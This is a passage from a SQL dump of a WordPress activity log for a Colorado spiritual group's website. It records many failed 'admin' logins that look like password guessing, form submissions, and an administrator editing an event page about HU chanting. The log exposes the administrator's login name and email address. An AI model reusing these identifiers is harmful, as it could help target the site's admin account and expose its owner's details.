er_unknown_login_failed'),(220573,36583,'_server_remote_addr','45.136.118.x'),(220574,36584,'failed_username','admin'),(220575,36584,'server_http_user_agent','Mozilla/5.0'),(220576,36584,'_message_key','user_unknown_login_failed'),(220577,36584,'_server_remote_addr','45.136.118.x'),(220578,36585,'failed_username','admin'),(220579,36585,'server_http_user_agent','Mozilla/5.0'),(220580,36585,'_message_key','user_unknown_login_failed'),(220581,36585,'_server_remote_addr','45.136.118.x'),(220582,36586,'failed_username','admin'),(220583,36586,'server_http_user_agent','Mozilla/5.0'),(220584,36586,'_message_key','user_unknown_login_failed'),(220585,36586,'_server_remote_addr','45.136.118.x'),(220586,36587,'failed_username','admin'),(220587,36587,'server_http_user_agent','Mozilla/5.0'),(220588,36587,'_message_key','user_unknown_login_failed'),(220589,36587,'_server_remote_addr','45.136.118.x'),(220590,36588,'failed_username','admin'),(220591,36588,'server_http_user_agent','Mozilla/5.0'),(220592,36588,'_message_key','user_unknown_login_failed'),(220593,36588,'_server_remote_addr','45.136.118.x'),(220594,36589,'failed_username','admin'),(220595,36589,'server_http_user_agent','Mozilla/5.0'),(220596,36589,'_message_key','user_unknown_login_failed'),(220597,36589,'_server_remote_addr','45.136.118.x'),(220598,36590,'failed_username','admin'),(220599,36590,'server_http_user_agent','Mozilla/5.0'),(220600,36590,'_message_key','user_unknown_login_failed'),(220601,36590,'_server_remote_addr','45.136.118.x'),(220602,36591,'failed_username','admin'),(220603,36591,'server_http_user_agent','Mozilla/5.0'),(220604,36591,'_message_key','user_unknown_login_failed'),(220605,36591,'_server_remote_addr','45.136.118.x'),(220606,36592,'failed_username','admin'),(220607,36592,'server_http_user_agent','Mozilla/5.0'),(220608,36592,'_message_key','user_unknown_login_failed'),(220609,36592,'_server_remote_addr','45.136.118.x'),(220610,36593,'failed_username','admin'),(220611,36593,'server_http_user_agent','Mozilla/5.0'),(220612,36593,'_message_key','user_unknown_login_failed'),(220613,36593,'_server_remote_addr','45.136.118.x'),(220614,36594,'failed_username','admin'),(220615,36594,'server_http_user_agent','Mozilla/5.0'),(220616,36594,'_message_key','user_unknown_login_failed'),(220617,36594,'_server_remote_addr','45.136.118.x'),(220618,36595,'failed_username','admin'),(220619,36595,'server_http_user_agent','Mozilla/5.0'),(220620,36595,'_message_key','user_unknown_login_failed'),(220621,36595,'_server_remote_addr','45.136.118.x'),(220622,36596,'failed_username','admin'),(220623,36596,'server_http_user_agent','Mozilla/5.0'),(220624,36596,'_message_key','user_unknown_login_failed'),(220625,36596,'_server_remote_addr','45.136.118.x'),(220626,36597,'failed_username','admin'),(220627,36597,'server_http_user_agent','Mozilla/5.0'),(220628,36597,'_message_key','user_unknown_login_failed'),(220629,36597,'_server_remote_addr','45.136.118.x'),(220630,36598,'failed_username','admin'),(220631,36598,'server_http_user_agent','Mozilla/5.0'),(220632,36598,'_message_key','user_unknown_login_failed'),(220633,36598,'_server_remote_addr','45.136.118.x'),(220634,36599,'failed_username','admin'),(220635,36599,'server_http_user_agent','Mozilla/5.0'),(220636,36599,'_message_key','user_unknown_login_failed'),(220637,36599,'_server_remote_addr','45.136.118.x'),(220638,36600,'failed_username','admin'),(220639,36600,'server_http_user_agent','Mozilla/5.0'),(220640,36600,'_message_key','user_unknown_login_failed'),(220641,36600,'_server_remote_addr','45.136.118.x'),(220642,36601,'failed_username','admin'),(220643,36601,'server_http_user_agent','Mozilla/5.0'),(220644,36601,'_message_key','user_unknown_login_failed'),(220645,36601,'_server_remote_addr','45.136.118.x'),(220646,36602,'failed_username','admin'),(220647,36602,'server_http_user_agent','Mozilla/5.0'),(220648,36602,'_message_key','user_unknown_login_failed'),(220649,36602,'_server_remote_addr','45.136.118.x'),(220650,36603,'failed_username','admin'),(220651,36603,'server_http_user_agent','Mozilla/5.0'),(220652,36603,'_message_key','user_unknown_login_failed'),(220653,36603,'_server_remote_addr','45.136.118.x'),(220654,36604,'failed_username','admin'),(220655,36604,'server_http_user_agent','Mozilla/5.0'),(220656,36604,'_message_key','user_unknown_login_failed'),(220657,36604,'_server_remote_addr','45.136.118.x'),(220658,36605,'failed_username','admin'),(220659,36605,'server_http_user_agent','Mozilla/5.0'),(220660,36605,'_message_key','user_unknown_login_failed'),(220661,36605,'_server_remote_addr','45.136.118.x'),(220662,36606,'post_id','269180'),(220663,36606,'post_type','nf_sub'),(220664,36606,'post_title',''),(220665,36606,'_message_key','post_updated'),(220666,36606,'_server_remote_addr','107.77.201.x'),(220667,36606,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/?utm_source=BenchmarkEmail&utm_campaign=ETC_October_2023_News&utm_medium=email'),(220668,36607,'failed_username','admin'),(220669,36607,'server_http_user_agent','Mozilla/5.0'),(220670,36607,'_message_key','user_unknown_login_failed'),(220671,36607,'_server_remote_addr','45.136.118.x'),(220672,36608,'failed_username','admin'),(220673,36608,'server_http_user_agent','Mozilla/5.0'),(220674,36608,'_message_key','user_unknown_login_failed'),(220675,36608,'_server_remote_addr','45.136.118.x'),(220676,36609,'failed_username','admin'),(220677,36609,'server_http_user_agent','Mozilla/5.0'),(220678,36609,'_message_key','user_unknown_login_failed'),(220679,36609,'_server_remote_addr','45.136.118.x'),(220680,36610,'failed_username','admin'),(220681,36610,'server_http_user_agent','Mozilla/5.0'),(220682,36610,'_message_key','user_unknown_login_failed'),(220683,36610,'_server_remote_addr','45.136.118.x'),(220684,36611,'failed_username','admin'),(220685,36611,'server_http_user_agent','Mozilla/5.0'),(220686,36611,'_message_key','user_unknown_login_failed'),(220687,36611,'_server_remote_addr','45.136.118.x'),(220688,36612,'post_id','269181'),(220689,36612,'post_type','nf_sub'),(220690,36612,'post_title',''),(220691,36612,'_message_key','post_updated'),(220692,36612,'_server_remote_addr','67.165.238.x'),(220693,36612,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(220694,36613,'failed_username','admin'),(220695,36613,'server_http_user_agent','Mozilla/5.0'),(220696,36613,'_message_key','user_unknown_login_failed'),(220697,36613,'_server_remote_addr','45.136.118.x'),(220698,36614,'failed_username','admin'),(220699,36614,'server_http_user_agent','Mozilla/5.0'),(220700,36614,'_message_key','user_unknown_login_failed'),(220701,36614,'_server_remote_addr','45.136.118.x'),(220702,36615,'user_id','2'),(220703,36615,'user_email','nada@zipnadanot.org'),(220704,36615,'user_login','S8zhaBda'),(220705,36615,'_user_id','2'),(220706,36615,'_user_login','S8zhaBda'),(220707,36615,'_user_email','nada@zipnadanot.org'),(220708,36615,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0'),(220709,36615,'_message_key','user_logged_in'),(220710,36615,'_server_remote_addr','76.130.120.x'),(220711,36615,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Fwww.eckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(220712,36616,'failed_username','admin'),(220713,36616,'server_http_user_agent','Mozilla/5.0'),(220714,36616,'_message_key','user_unknown_login_failed'),(220715,36616,'_server_remote_addr','45.136.118.x'),(220716,36617,'failed_username','admin'),(220717,36617,'server_http_user_agent','Mozilla/5.0'),(220718,36617,'_message_key','user_unknown_login_failed'),(220719,36617,'_server_remote_addr','74.249.245.x'),(220720,36618,'failed_username','admin'),(220721,36618,'server_http_user_agent','Mozilla/5.0'),(220722,36618,'_message_key','user_unknown_login_failed'),(220723,36618,'_server_remote_addr','45.136.118.x'),(220724,36619,'failed_username','admin'),(220725,36619,'server_http_user_agent','Mozilla/5.0'),(220726,36619,'_message_key','user_unknown_login_failed'),(220727,36619,'_server_remote_addr','74.249.245.x'),(220728,36620,'failed_username','admin'),(220729,36620,'server_http_user_agent','Mozilla/5.0'),(220730,36620,'_message_key','user_unknown_login_failed'),(220731,36620,'_server_remote_addr','45.136.118.x'),(220732,36621,'failed_username','admin'),(220733,36621,'server_http_user_agent','Mozilla/5.0'),(220734,36621,'_message_key','user_unknown_login_failed'),(220735,36621,'_server_remote_addr','74.249.245.x'),(220736,36622,'failed_username','admin'),(220737,36622,'server_http_user_agent','Mozilla/5.0'),(220738,36622,'_message_key','user_unknown_login_failed'),(220739,36622,'_server_remote_addr','45.136.118.x'),(220740,36623,'failed_username','admin'),(220741,36623,'server_http_user_agent','Mozilla/5.0'),(220742,36623,'_message_key','user_unknown_login_failed'),(220743,36623,'_server_remote_addr','74.249.245.x'),(220744,36624,'failed_username','admin'),(220745,36624,'server_http_user_agent','Mozilla/5.0'),(220746,36624,'_message_key','user_unknown_login_failed'),(220747,36624,'_server_remote_addr','45.136.118.x'),(220748,36625,'failed_username','admin'),(220749,36625,'server_http_user_agent','Mozilla/5.0'),(220750,36625,'_message_key','user_unknown_login_failed'),(220751,36625,'_server_remote_addr','74.249.245.x'),(220752,36626,'failed_username','admin'),(220753,36626,'server_http_user_agent','Mozilla/5.0'),(220754,36626,'_message_key','user_unknown_login_failed'),(220755,36626,'_server_remote_addr','45.136.118.x'),(220756,36627,'failed_username','admin'),(220757,36627,'server_http_user_agent','Mozilla/5.0'),(220758,36627,'_message_key','user_unknown_login_failed'),(220759,36627,'_server_remote_addr','74.249.245.x'),(220760,36628,'failed_username','admin'),(220761,36628,'server_http_user_agent','Mozilla/5.0'),(220762,36628,'_message_key','user_unknown_login_failed'),(220763,36628,'_server_remote_addr','45.136.118.x'),(220764,36629,'failed_username','admin'),(220765,36629,'server_http_user_agent','Mozilla/5.0'),(220766,36629,'_message_key','user_unknown_login_failed'),(220767,36629,'_server_remote_addr','74.249.245.x'),(220768,36630,'failed_username','admin'),(220769,36630,'server_http_user_agent','Mozilla/5.0'),(220770,36630,'_message_key','user_unknown_login_failed'),(220771,36630,'_server_remote_addr','45.136.118.x'),(220772,36631,'failed_username','admin'),(220773,36631,'server_http_user_agent','Mozilla/5.0'),(220774,36631,'_message_key','user_unknown_login_failed'),(220775,36631,'_server_remote_addr','74.249.245.x'),(220776,36632,'failed_username','admin'),(220777,36632,'server_http_user_agent','Mozilla/5.0'),(220778,36632,'_message_key','user_unknown_login_failed'),(220779,36632,'_server_remote_addr','45.136.118.x'),(220780,36633,'failed_username','admin'),(220781,36633,'server_http_user_agent','Mozilla/5.0'),(220782,36633,'_message_key','user_unknown_login_failed'),(220783,36633,'_server_remote_addr','74.249.245.x'),(220784,36634,'failed_username','admin'),(220785,36634,'server_http_user_agent','Mozilla/5.0'),(220786,36634,'_message_key','user_unknown_login_failed'),(220787,36634,'_server_remote_addr','45.136.118.x'),(220788,36635,'failed_username','admin'),(220789,36635,'server_http_user_agent','Mozilla/5.0'),(220790,36635,'_message_key','user_unknown_login_failed'),(220791,36635,'_server_remote_addr','74.249.245.x'),(220792,36636,'failed_username','admin'),(220793,36636,'server_http_user_agent','Mozilla/5.0'),(220794,36636,'_message_key','user_unknown_login_failed'),(220795,36636,'_server_remote_addr','45.136.118.x'),(220796,36637,'failed_username','admin'),(220797,36637,'server_http_user_agent','Mozilla/5.0'),(220798,36637,'_message_key','user_unknown_login_failed'),(220799,36637,'_server_remote_addr','74.249.245.x'),(220800,36638,'failed_username','admin'),(220801,36638,'server_http_user_agent','Mozilla/5.0'),(220802,36638,'_message_key','user_unknown_login_failed'),(220803,36638,'_server_remote_addr','45.136.118.x'),(220804,36639,'failed_username','admin'),(220805,36639,'server_http_user_agent','Mozilla/5.0'),(220806,36639,'_message_key','user_unknown_login_failed'),(220807,36639,'_server_remote_addr','74.249.245.x'),(220808,36640,'failed_username','admin'),(220809,36640,'server_http_user_agent','Mozilla/5.0'),(220810,36640,'_message_key','user_unknown_login_failed'),(220811,36640,'_server_remote_addr','45.136.118.x'),(220812,36641,'failed_username','admin'),(220813,36641,'server_http_user_agent','Mozilla/5.0'),(220814,36641,'_message_key','user_unknown_login_failed'),(220815,36641,'_server_remote_addr','74.249.245.x'),(220816,36642,'failed_username','admin'),(220817,36642,'server_http_user_agent','Mozilla/5.0'),(220818,36642,'_message_key','user_unknown_login_failed'),(220819,36642,'_server_remote_addr','45.136.118.x'),(220820,36643,'failed_username','admin'),(220821,36643,'server_http_user_agent','Mozilla/5.0'),(220822,36643,'_message_key','user_unknown_login_failed'),(220823,36643,'_server_remote_addr','74.249.245.x'),(220824,36644,'post_id','269182'),(220825,36644,'post_type','nf_sub'),(220826,36644,'post_title',''),(220827,36644,'_message_key','post_updated'),(220828,36644,'_server_remote_addr','161.97.243.x'),(220829,36644,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(220830,36645,'post_id','269183'),(220831,36645,'post_type','nf_sub'),(220832,36645,'post_title',''),(220833,36645,'_message_key','post_updated'),(220834,36645,'_server_remote_addr','161.97.243.x'),(220835,36645,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(220836,36646,'failed_username','admin'),(220837,36646,'server_http_user_agent','Mozilla/5.0'),(220838,36646,'_message_key','user_unknown_login_failed'),(220839,36646,'_server_remote_addr','45.136.118.x'),(220840,36647,'failed_username','admin'),(220841,36647,'server_http_user_agent','Mozilla/5.0'),(220842,36647,'_message_key','user_unknown_login_failed'),(220843,36647,'_server_remote_addr','74.249.245.x'),(220844,36648,'failed_username','admin'),(220845,36648,'server_http_user_agent','Mozilla/5.0'),(220846,36648,'_message_key','user_unknown_login_failed'),(220847,36648,'_server_remote_addr','45.136.118.x'),(220848,36649,'failed_username','admin'),(220849,36649,'server_http_user_agent','Mozilla/5.0'),(220850,36649,'_message_key','user_unknown_login_failed'),(220851,36649,'_server_remote_addr','74.249.245.x'),(220852,36650,'failed_username','admin'),(220853,36650,'server_http_user_agent','Mozilla/5.0'),(220854,36650,'_message_key','user_unknown_login_failed'),(220855,36650,'_server_remote_addr','45.136.118.x'),(220856,36651,'failed_username','admin'),(220857,36651,'server_http_user_agent','Mozilla/5.0'),(220858,36651,'_message_key','user_unknown_login_failed'),(220859,36651,'_server_remote_addr','74.249.245.x'),(220860,36652,'user_id','2'),(220861,36652,'user_email','nada@zipnadanot.org'),(220862,36652,'user_login','S8zhaBda'),(220863,36652,'_user_id','2'),(220864,36652,'_user_login','S8zhaBda'),(220865,36652,'_user_email','nada@zipnadanot.org'),(220866,36652,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0'),(220867,36652,'_message_key','user_logged_in'),(220868,36652,'_server_remote_addr','76.130.120.x'),(220869,36652,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Fwww.eckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(220870,36653,'post_id','269184'),(220871,36653,'post_type','mec-events'),(220872,36653,'post_title','SOUND OF SOUL IN PERSON TEMPLATE | Benefit Title Goes Here'),(220873,36653,'_message_key','post_updated'),(220874,36653,'_user_id','2'),(220875,36653,'_user_login','S8zhaBda'),(220876,36653,'_user_email','nada@zipnadanot.org'),(220877,36653,'_server_remote_addr','76.130.120.x'),(220878,36653,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?s=template&post_status=all&post_type=mec-events&action=-1&m=0&mec_start_date&mec_label=0&mec_location=0&mec_category=0&_mecnonce=51a5c0b7da&mec%5Btitle%5D&mec%5Bcolor%5D=%23&mec%5Bdate%5D%5Bstart%5D%5Bdate%5D=10%2F10%2F2023&mec%5Bdate%5D%5Bstart%5D%5Bhour%5D=8&mec%5Bdate%5D%5Bstart%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bstart%5D%5Bampm%5D=AM&mec%5Bdate%5D%5Bend%5D%5Bdate%5D=10%2F10%2F2023&mec%5Bdate%5D%5Bend%5D%5Bhour%5D=6&mec%5Bdate%5D%5Bend%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bend%5D%5Bampm%5D=PM&mec%5Blocation_id%5D=1&mec%5Bdont_show_map%5D=1&mec%5Blocation%5D%5Bname%5D&mec%5Blocation%5D%5Baddress%5D&mec%5Blocation%5D%5Blatitude%5D&mec%5Blocation%5D%5Blongitude%5D&mec%5Borganizer_id%5D=1&mec%5Borganizer%5D%5Bname%5D&mec%5Borganizer%5D%5Btel%5D&mec%5Borganizer%5D%5Bemail%5D&mec%5Borganizer%5D%5Burl%5D&mec%5Borganizer%5D%5Bpage_label%5D&mec%5Borganizer%5D%5Bthumbnail%5D&mec%5Bcontent%5D&mec%5Bfeatured_image%5D&paged=1&action2=-1'),(220879,36654,'new_post_title','SOUND OF SOUL IN PERSON TEMPLATE | Benefit Title Goes Here'),(220880,36654,'new_post_id','269184'),(220881,36654,'duplicated_post_title','SOUND OF SOUL IN PERSON TEMPLATE | Benefit Title Goes Here'),(220882,36654,'duplicated_post_id','266827'),(220883,36654,'_message_key','post_duplicated'),(220884,36654,'_user_id','2'),(220885,36654,'_user_login','S8zhaBda'),(220886,36654,'_user_email','nada@zipnadanot.org'),(220887,36654,'_server_remote_addr','76.130.120.x'),(220888,36654,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?s=template&post_status=all&post_type=mec-events&action=-1&m=0&mec_start_date&mec_label=0&mec_location=0&mec_category=0&_mecnonce=51a5c0b7da&mec%5Btitle%5D&mec%5Bcolor%5D=%23&mec%5Bdate%5D%5Bstart%5D%5Bdate%5D=10%2F10%2F2023&mec%5Bdate%5D%5Bstart%5D%5Bhour%5D=8&mec%5Bdate%5D%5Bstart%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bstart%5D%5Bampm%5D=AM&mec%5Bdate%5D%5Bend%5D%5Bdate%5D=10%2F10%2F2023&mec%5Bdate%5D%5Bend%5D%5Bhour%5D=6&mec%5Bdate%5D%5Bend%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bend%5D%5Bampm%5D=PM&mec%5Blocation_id%5D=1&mec%5Bdont_show_map%5D=1&mec%5Blocation%5D%5Bname%5D&mec%5Blocation%5D%5Baddress%5D&mec%5Blocation%5D%5Blatitude%5D&mec%5Blocation%5D%5Blongitude%5D&mec%5Borganizer_id%5D=1&mec%5Borganizer%5D%5Bname%5D&mec%5Borganizer%5D%5Btel%5D&mec%5Borganizer%5D%5Bemail%5D&mec%5Borganizer%5D%5Burl%5D&mec%5Borganizer%5D%5Bpage_label%5D&mec%5Borganizer%5D%5Bthumbnail%5D&mec%5Bcontent%5D&mec%5Bfeatured_image%5D&paged=1&action2=-1'),(220889,36655,'failed_username','admin'),(220890,36655,'server_http_user_agent','Mozilla/5.0'),(220891,36655,'_message_key','user_unknown_login_failed'),(220892,36655,'_server_remote_addr','45.136.118.x'),(220893,36656,'post_id','269184'),(220894,36656,'post_type','mec-events'),(220895,36656,'post_title','Sparkplug to Spiritual Growth'),(220896,36656,'post_meta_added','79'),(220897,36656,'_message_key','post_updated'),(220898,36656,'_user_id','2'),(220899,36656,'_user_login','S8zhaBda'),(220900,36656,'_user_email','nada@zipnadanot.org'),(220901,36656,'_server_remote_addr','76.130.120.x'),(220902,36656,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269184'),(220903,36657,'post_id','269184'),(220904,36657,'post_type','mec-events'),(220905,36657,'post_title','Sparkplug to Spiritual Growth'),(220906,36657,'post_meta_added','79'),(220907,36657,'_message_key','post_updated'),(220908,36657,'_user_id','2'),(220909,36657,'_user_login','S8zhaBda'),(220910,36657,'_user_email','nada@zipnadanot.org'),(220911,36657,'_server_remote_addr','76.130.120.x'),(220912,36657,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269184'),(220913,36658,'failed_username','admin'),(220914,36658,'server_http_user_agent','Mozilla/5.0'),(220915,36658,'_message_key','user_unknown_login_failed'),(220916,36658,'_server_remote_addr','74.249.245.x'),(220917,36659,'post_id','269184'),(220918,36659,'post_type','mec-events'),(220919,36659,'post_title','Sparkplug to Spiritual Growth'),(220920,36659,'post_prev_post_name',''),(220921,36659,'post_new_post_name','sparkplug-to-spiritual-growth'),(220922,36659,'post_prev_post_content','<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\n<p class=\"\" style=\"line-height: 32px;\"><span style=\"font-size: 20pt;\"><strong><span class=\"\" style=\"color: #ad7f14;\">Discover HU, Ancient Mantra and Sacred Sound Sound.<br>\n</span></strong></span><span style=\"font-size: 18pt;\">You’re invited to experience chanting <strong>HU</strong>, contemplative time, and spiritual conversation with others of like heart.</span></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">The program experience includes a personal introduction by the facilitator, the reading of a short ECK quote, singing HU for 15 to 20 minutes, and ends with a silent contemplation for a few minutes. HU is an ancient name for God that has been sung for thousands of years in many lands for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life. Here are some of the many benefits of HU:</span></p>\n<ul class=\"\">\n	<li><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\n	<li><span style=\"font-size: 14pt;\">Divine love</span></li>\n	<li><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\n	<li><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\n	<li><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\n</ul>\n<p class=\"\"><span style=\"font-size: 14pt;\">Stay afterward for spiritual discussion, light refreshments and fellowship.</span></p>\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/pagosa-springs-spiritual-experiences-group/events/286733007/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\n</div>\n</div>\n</div>\n</div>'),(220923,36659,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\" style=\"line-height: 32px;\"><span style=\"font-size: 20pt;\"><strong><span class=\"\" style=\"color: #ad7f14;\">Discover HU, Ancient Mantra and Sacred Sound Sound.<br>\r\n</span></strong></span><span style=\"font-size: 18pt;\">You’re invited to experience chanting <strong>HU</strong>, contemplative time, and spiritual conversation with others of like heart.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The program experience includes a personal introduction by the facilitator, the reading of a short ECK quote, singing HU for 15 to 20 minutes, and ends with a silent contemplation for a few minutes. HU is an ancient name for God that has been sung for thousands of years in many lands for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life. Here are some of the many benefits of HU:</span></p>\r\n<ul class=\"\">\r\n	<li><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Stay afterward for spiritual discussion, light refreshments and fellowship.</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/pagosa-springs-spiritual-experiences-group/events/286733007/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(220924,36659,'post_prev_post_status','draft'),(220925,36659,'post_new_post_status','publish'),(220926,36659,'post_prev_post_date','2023-10-09 12:55:20'),(220927,36659,'post_new_post_date','2023-10-09 13:00:50'),(220928,36659,'post_prev_post_date_gmt','0000-00-00 00:00:00'),(220929,36659,'post_new_post_date_gmt','2023-10-09 19:00:50'),(220930,36659,'post_new_thumb_id','268748'),(220931,36659,'post_new_thumb_title','bridge-2'),(220932,36659,'_message_key','post_updated'),(220933,36659,'_user_id','2'),(220934,36659,'_user_login','S8zhaBda'),(220935,36659,'_user_email','nada@zipnadanot.org'),(220936,36659,'_server_remote_addr','76.130.120.x'),(220937,36659,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269184'),(220938,36660,'post_id','269184'),(220939,36660,'post_type','mec-events'),(220940,36660,'post_title','Sparkplug to Spiritual Growth'),(220941,36660,'post_prev_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\" style=\"line-height: 32px;\"><span style=\"font-size: 20pt;\"><strong><span class=\"\" style=\"color: #ad7f14;\">Discover HU, Ancient Mantra and Sacred Sound Sound.<br>\r\n</span></strong></span><span style=\"font-size: 18pt;\">You’re invited to experience chanting <strong>HU</strong>, contemplative time, and spiritual conversation with others of like heart.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The program experience includes a personal introduction by the facilitator, the reading of a short ECK quote, singing HU for 15 to 20 minutes, and ends with a silent contemplation for a few minutes. HU is an ancient name for God that has been sung for thousands of years in many lands for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life. Here are some of the many benefits of HU:</span></p>\r\n<ul class=\"\">\r\n	<li><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Stay afterward for spiritual discussion, light refreshments and fellowship.</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/pagosa-springs-spiritual-experiences-group/events/286733007/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(220942,36660,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\" style=\"line-height: 32px;\"><span style=\"font-size: 20pt;\"><strong><span class=\"\" style=\"color: #ad7f14;\">Discover HU, Ancient Mantra and Sacred Sound.<br>\r\n</span></strong></span><span style=\"font-size: 18pt;\">You’re invited to experience chanting <strong>HU</strong>, contemplative time, and spiritual conversation with others of like heart.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The program experience includes a personal introduction by the facilitator, the reading of a short ECK quote, singing HU for 15 to 20 minutes, and ends with a silent contemplation for a few minutes. HU is an ancient name for God that has been sung for thousands of years in many lands for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life. Here are some of the many benefits of HU:</span></p>\r\n<ul class=\"\">\r\n	<li><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Stay afterward for spiritual discussion, light refreshments and fellowship.</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/pagosa-springs-spiritual-experiences-group/events/286733007/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(220943,36660,'_message_key','post_updated'),(220944,36660,'_user_id','2'),(220945,36660,'_user_login','S8zhaBda'),(220946,36660,'_user_email','nada@zipnadanot.org'),(220947,36660,'_server_remote_addr','76.130.120.x'),(220948,36660,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269184&action=edit'),(220949,36661,'post_id','269184'),(220950,36661,'post_type','mec-events'),(220951,36661,'post_title','Sparkplug to Spiritual Growth'),(220952,36661,'post_prev_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\" style=\"line-height: 32px;\"><span style=\"font-size: 20pt;\"><strong><span class=\"\" style=\"color: #ad7f14;\">Discover HU, Ancient Mantra and Sacred Sound.<br>\r\n</span></strong></span><span style=\"font-size: 18pt;\">You’re invited to experience chanting <strong>HU</strong>, contemplative time, and spiritual conversation with others of like heart.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The program experience includes a personal introduction by the facilitator, the reading of a short ECK quote, singing HU for 15 to 20 minutes, and ends with a silent contemplation for a few minutes. HU is an ancient name for God that has been sung for thousands of years in many lands for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life. Here are some of the many benefits of HU:</span></p>\r\n<ul class=\"\">\r\n	<li><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Divine 